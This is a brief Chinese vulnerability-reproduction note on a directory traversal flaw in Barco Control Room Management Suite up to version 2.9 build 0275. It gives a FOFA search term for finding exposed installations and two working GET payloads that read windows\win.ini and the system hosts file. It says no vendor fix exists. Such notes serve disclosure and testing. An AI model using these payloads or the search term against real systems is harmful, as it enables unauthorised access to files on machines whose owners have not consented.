一、漏洞描述
通过 Suite 2.9 Build 0275 进行的巴可控制室管理被发现容易受到目录遍历的影响,从而允许攻击者访问敏感信息和组件。请求必须以“GET /..\..”字符串开头。
二、影响版本
Barco Control Room Management Suite <= 2.9 build 0275
三、漏洞环境
fofa:barco
四、漏洞复现
paylaod:
GET /..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
GET /..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts
五、更新建议
目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:
巴可公司官方网站 视觉影像专家 - Barco
